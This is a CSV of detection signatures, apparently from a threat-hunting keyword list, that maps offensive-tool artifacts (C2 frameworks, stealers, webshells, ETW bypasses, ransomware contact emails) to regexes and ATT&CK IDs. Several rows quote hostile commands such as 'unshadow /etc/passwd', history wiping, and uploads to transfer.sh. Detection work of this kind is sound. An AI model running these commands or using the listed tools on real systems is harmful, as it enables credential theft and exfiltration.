"*unix_kerberos_tickets.rb*",".{0,1000}unix_kerberos_tickets\.rb.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","1","#linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","61879"
"*UnkL4b/BabyShark*",".{0,1000}UnkL4b\/BabyShark.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1547.001 - T1059.003 - T1132.001 - T1140 - T1083 - T1070.004 - T1105 - T1056.001 - T1057 - T1012 - T1053.005 - T1218.005 - T1082 - T1016 - T1033","TA0006 - TA0011 - TA0040","N/A","Kimsuky","C2","https://github.com/UnkL4b/BabyShark","1","1","N/A","N/A","10","10","189","30","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z","61880"
"*unknown mythic client configuration setting: *",".{0,1000}unknown\smythic\sclient\sconfiguration\ssetting\:\s.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","61881"
"*unkvolism/Fuck-Etw*",".{0,1000}unkvolism\/Fuck\-Etw.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","1","N/A","N/A","10","2","102","13","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z","61882"
"*unlink -- tells the current rat to disconnect from a child rat given a local file or UNC path*",".{0,1000}unlink\s\-\-\stells\sthe\scurrent\srat\sto\sdisconnect\sfrom\sa\schild\srat\sgiven\sa\slocal\sfile\sor\sUNC\spath.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","61883"
"*UnlinkDLL.exe*",".{0,1000}UnlinkDLL\.exe.{0,1000}","offensive_tool_keyword","UnlinkDLL","DLL Unlinking from InLoadOrderModuleList - InMemoryOrderModuleList - InInitializationOrderModuleList and LdrpHashTable","T1055 - T1027 - T1070","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/UnlinkDLL","1","1","N/A","N/A","7","1","57","13","2023-12-15T12:04:00Z","2023-12-13T14:37:33Z","61890"
"*UnlinkDLL\Main.nim*",".{0,1000}UnlinkDLL\\Main\.nim.{0,1000}","offensive_tool_keyword","UnlinkDLL","DLL Unlinking from InLoadOrderModuleList - InMemoryOrderModuleList - InInitializationOrderModuleList and LdrpHashTable","T1055 - T1027 - T1070","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/UnlinkDLL","1","0","N/A","N/A","7","1","57","13","2023-12-15T12:04:00Z","2023-12-13T14:37:33Z","61891"
"*UnlinkDLL\Structs.nim*",".{0,1000}UnlinkDLL\\Structs\.nim.{0,1000}","offensive_tool_keyword","UnlinkDLL","DLL Unlinking from InLoadOrderModuleList - InMemoryOrderModuleList - InInitializationOrderModuleList and LdrpHashTable","T1055 - T1027 - T1070","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/UnlinkDLL","1","0","N/A","N/A","7","1","57","13","2023-12-15T12:04:00Z","2023-12-13T14:37:33Z","61892"
"*UnlinkDLL-main*",".{0,1000}UnlinkDLL\-main.{0,1000}","offensive_tool_keyword","UnlinkDLL","DLL Unlinking from InLoadOrderModuleList - InMemoryOrderModuleList - InInitializationOrderModuleList and LdrpHashTable","T1055 - T1027 - T1070","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/UnlinkDLL","1","1","N/A","N/A","7","1","57","13","2023-12-15T12:04:00Z","2023-12-13T14:37:33Z","61893"
"*unlock@cl-leaks.com*",".{0,1000}unlock\@cl\-leaks\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","61894"
"*unlock@rsv-box.com*",".{0,1000}unlock\@rsv\-box\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","61895"
"*unlock@support-box.com*",".{0,1000}unlock\@support\-box\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","61896"
"*unmanagedPowershell */command*",".{0,1000}unmanagedPowershell\s.{0,1000}\/command.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","61897"
"*unmarshal_cmd_exec.*",".{0,1000}unmarshal_cmd_exec\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","61898"
"*UnmarshalPwn.*",".{0,1000}UnmarshalPwn\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","61899"
"*UnmarshalPwn.exe*",".{0,1000}UnmarshalPwn\.exe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","61900"
"*unode/firefox_decrypt*",".{0,1000}unode\/firefox_decrypt.{0,1000}","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","N/A","10","10","2172","317","2024-11-08T13:52:34Z","2014-01-17T13:25:02Z","61901"
"*Unpacking Successful!\n\nExecuting from Memory >>>> *",".{0,1000}Unpacking\sSuccessful!\\n\\nExecuting\sfrom\sMemory\s\>\>\>\>\s.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","N/A","9","1","57","14","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z","61902"
"*UnquotedPath.csproj*",".{0,1000}UnquotedPath\.csproj.{0,1000}","offensive_tool_keyword","UnquotedPath","Outputs a list of unquoted service paths that aren't in System32/SysWow64 to plant a PE into","T1543.003 - T1036.005 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","61903"
"*UnquotedPath.exe*",".{0,1000}UnquotedPath\.exe.{0,1000}","offensive_tool_keyword","UnquotedPath","Outputs a list of unquoted service paths that aren't in System32/SysWow64 to plant a PE into","T1543.003 - T1036.005 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","61904"
"*unset -f hs_init hs_init_alias hs_init_dl hs_init_shell*",".{0,1000}unset\s\-f\shs_init\shs_init_alias\shs_init_dl\shs_init_shell.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","0","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","61905"
"*unset SSH_CLIENT SSH_CONNECTION; TERM=xterm-256color HISTFILE=/dev/null *",".{0,1000}unset\sSSH_CLIENT\sSSH_CONNECTION\;\sTERM\=xterm\-256color\sHISTFILE\=\/dev\/null\s.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","0","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","61912"
"*unshackle --*",".{0,1000}unshackle\s\-\-.{0,1000}","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","0","#linux #windows","N/A","10","10","1899","125","2023-11-10T19:48:10Z","2023-07-19T22:30:28Z","61913"
"*unshackle-main*",".{0,1000}unshackle\-main.{0,1000}","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","#linux #windows","N/A","10","10","1899","125","2023-11-10T19:48:10Z","2023-07-19T22:30:28Z","61914"
"*unshackle-v1.0.iso*",".{0,1000}unshackle\-v1\.0\.iso.{0,1000}","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","#linux #windows","N/A","10","10","1899","125","2023-11-10T19:48:10Z","2023-07-19T22:30:28Z","61915"
"*unshadow /etc/passwd*",".{0,1000}unshadow\s\/etc\/passwd.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","#linux","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","61916"
"*unshadow passwd shadow*",".{0,1000}unshadow\spasswd\sshadow.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","#linux","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","61918"
"*untested_payloads.rb*",".{0,1000}untested_payloads\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","61919"
"*UnwindInspector.exe*",".{0,1000}UnwindInspector\.exe.{0,1000}","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","N/A","9","8","760","100","2024-07-20T10:41:31Z","2022-12-04T13:30:33Z","61920"
"*unzip websites.zip -d sites > /dev/null*",".{0,1000}unzip\swebsites\.zip\s\-d\ssites\s\>\s\/dev\/null.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","61921"
"*UP104D7060F113(*",".{0,1000}UP104D7060F113\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","61922"
"*UP104D70K3N(*",".{0,1000}UP104D70K3N\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","61923"
"*update_vba_file_url_droppingPath(*",".{0,1000}update_vba_file_url_droppingPath\(.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","N/A","10","","N/A","","","","61926"
"*Update-ExeFunctions*",".{0,1000}Update\-ExeFunctions.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","61932"
"*update-rc.d tor2web defaults*",".{0,1000}update\-rc\.d\stor2web\sdefaults.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","61933"
"*Updating Metasploit Framework*",".{0,1000}Updating\sMetasploit\sFramework.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","61934"
"*Upload it to the target server and let\\'s start having some fun :) *",".{0,1000}Upload\sit\sto\sthe\starget\sserver\sand\slet\\\\\'s\sstart\shaving\ssome\sfun\s\:\)\s.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","61941"
"*upload.nolog.cz*",".{0,1000}upload\.nolog\.cz.{0,1000}","offensive_tool_keyword","upload.nolog.cz","sharing platform","T1567.002","TA0010","N/A","N/A","Data Exfiltration","https://upload.nolog.cz/","1","1","#filehostingservice","N/A","8","10","N/A","N/A","N/A","N/A","61943"
"*Upload.Password=antichat*",".{0,1000}Upload\.Password\=antichat.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","0","N/A","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","61944"
"*upload-dll * *.dll*",".{0,1000}upload\-dll\s.{0,1000}\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","0","N/A","N/A","10","3","290","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z","61946"
"*--upload-file*transfer.sh*",".{0,1000}\-\-upload\-file.{0,1000}transfer\.sh.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","N/A","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","61947"
"*UploadFileImplant*",".{0,1000}UploadFileImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","61948"
"*Uploading encrypted ps module.*",".{0,1000}Uploading\sencrypted\sps\smodule\..{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","61949"
"*Uploading Juicy Potato binary*",".{0,1000}Uploading\sJuicy\sPotato\sbinary.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","61950"
"*Uploading malicious DLL via SMB*",".{0,1000}Uploading\smalicious\sDLL\svia\sSMB.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","#content","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","61951"
"*Uploading malicious SCNotification.exe.config via SMB*",".{0,1000}Uploading\smalicious\sSCNotification\.exe\.config\svia\sSMB.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","#content","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","61952"
"*Uploading mimikatz binary*",".{0,1000}Uploading\smimikatz\sbinary.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","61954"
"*uploading mstscax proxy dll to *",".{0,1000}uploading\smstscax\sproxy\sdll\sto\s.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","61955"
"*upx --brute *.exe*",".{0,1000}upx\s\-\-brute\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","61956"
"*upx -ultra-brute *.exe*",".{0,1000}upx\s\-ultra\-brute\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","61957"
"*UrbanBishop.exe*",".{0,1000}UrbanBishop\.exe.{0,1000}","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Sharp-Suite","1","1","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","61958"
"*Uri3n/Thread-Pool-Injection-PoC*",".{0,1000}Uri3n\/Thread\-Pool\-Injection\-PoC.{0,1000}","offensive_tool_keyword","Thread-Pool-Injection-PoC","Proof of concept code for thread pool based process injection in Windows.","T1055.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/Uri3n/Thread-Pool-Injection-PoC","1","1","N/A","N/A","8","2","115","13","2025-03-29T23:14:47Z","2024-01-24T07:42:08Z","61959"
"*URL must be provided for GIF embedding!*",".{0,1000}URL\smust\sbe\sprovided\sfor\sGIF\sembedding!.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","0","N/A","N/A","10","6","534","62","2025-03-10T07:32:22Z","2024-01-10T08:04:57Z","61960"
